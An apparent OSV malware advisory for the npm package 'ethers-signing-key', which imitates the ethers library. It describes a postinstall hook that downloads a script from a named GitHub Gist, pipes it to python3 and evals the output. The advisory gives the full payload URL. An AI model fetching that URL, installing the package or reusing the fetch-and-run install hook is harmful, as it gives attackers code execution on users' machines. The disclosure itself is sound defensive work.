ethers-signing-key @1.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-3761
Ecosystem
npm
Summary
The package's npm postinstall hook executes a one-liner that uses child_process.exec to curl/wget an unpinned Python script from a personal user's GitHub Gist (gist.githubusercontent.com/guellemilb/631fb6348967d9d475125edf67048c0e/raw/build_utils.py) and pipes it directly to python3 (with a node fallback). The captured stdout is additionally passed to eval(). The remote URL is mutable, unauthenticated, and not version-pinned, so the Gist owner can change the executed payload at any time. The package itself has no functional library surface — index.js contains only module.exports = {}; — and the package name 'ethers-signing-key' impersonates the ethers blockchain library (which exposes a SigningKey class), so the only meaningful effect of npm install ethers-signing-key is arbitrary remote code execution on the installer's machine at install time.
Source: amazon-inspector (b6735be7311be4f6b4f609762cfb77504fe141bc9d8d5b5c0a75d521119aa2fa)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.